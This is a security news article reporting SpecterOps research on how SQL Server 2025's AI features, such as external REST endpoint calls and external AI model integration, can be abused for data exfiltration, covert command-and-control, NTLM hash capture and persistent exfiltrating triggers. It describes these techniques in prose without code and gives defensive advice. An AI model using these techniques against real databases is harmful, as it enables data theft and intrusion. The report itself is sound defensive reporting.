SpecterOps Shows How SQL Server 2025 AI Features Enable Stealthy Data Exfiltration and C2
Researchers at SpecterOps have demonstrated that Microsoft SQL Server 2025's native AI features can be abused for covert data exfiltration and command-and-control communication, bypassing traditional security monitoring.
SpecterOps researchers have publicly demonstrated that Microsoft SQL Server 2025's newly introduced AI capabilities can be weaponized for stealthy data exfiltration and command-and-control (C2) operations. The findings, released alongside proof-of-concept code on GitHub, highlight how legitimate enterprise features intended for modern workloads like Retrieval-Augmented Generation (RAG) can be repurposed by attackers as powerful post-exploitation tools.
At the heart of the research is the stored procedure sp_invoke_external_rest_endpoint, which allows SQL Server to send HTTPS requests to external endpoints directly. While designed for legitimate API communication, this function enables attackers with sysadmin privileges to exfiltrate up to 100 MB of data over encrypted channels, bypassing traditional monitoring that relies on detecting suspicious command execution or unusual outbound connections. In a demonstrated attack scenario, a compromised SQL Server instance can query sensitive tables, convert the data to JSON, and transmit it to an attacker-controlled server using this procedure.
Another major feature, CREATE EXTERNAL MODEL, combined with AI_GENERATE_EMBEDDINGS, allows SQL Server to integrate with external AI models. Researchers showed that these functions can be abused to establish covert communication channels by encoding commands and responses within AI embedding data, making the traffic appear legitimate. This capability enables a new form of C2 infrastructure operating entirely within SQL queries, allowing attackers to create persistent backdoors that execute commands and return results without deploying traditional malware.
In more advanced scenarios, attackers can load malicious .NET CLR assemblies directly into SQL Server memory, eliminating the need for disk-based payloads and further reducing detection risk. The research also highlights a technique involving UNC paths in AI model configurations that can trigger NTLM authentication attempts over SMB, allowing attackers to capture or relay authentication hashes within a network.
Persistence is another concern. Attackers can create database triggers that automatically exfiltrate newly inserted or updated data. For example, any new user credentials added to a table can be immediately sent to an external server without additional interaction, turning the database into a continuous data leakage point.
Microsoft was notified of these findings but did not classify the behavior as a security vulnerability, meaning it remains exploitable in current deployments. This decision challenges traditional security assumptions, as SQL Server 2025 normalizes HTTPS communication for AI workloads, making it significantly harder to distinguish between legitimate and malicious activity.
From a defensive standpoint, SpecterOps recommends enforcing strict controls over database privileges, particularly sysadmin accounts, and closely monitoring features such as external REST endpoints and AI model integrations for potential abuse. Network-level controls, such as restricting outbound connections from database servers, can also help mitigate risk. Organizations must baseline normal AI-related traffic patterns to detect anomalies effectively.
As AI capabilities continue to be embedded in enterprise software, this case highlights a growing trend where legitimate features can be weaponized. SQL Server 2025 demonstrates how innovation without corresponding security controls can expand the attack surface, forcing defenders to adapt to an evolving threat landscape rapidly.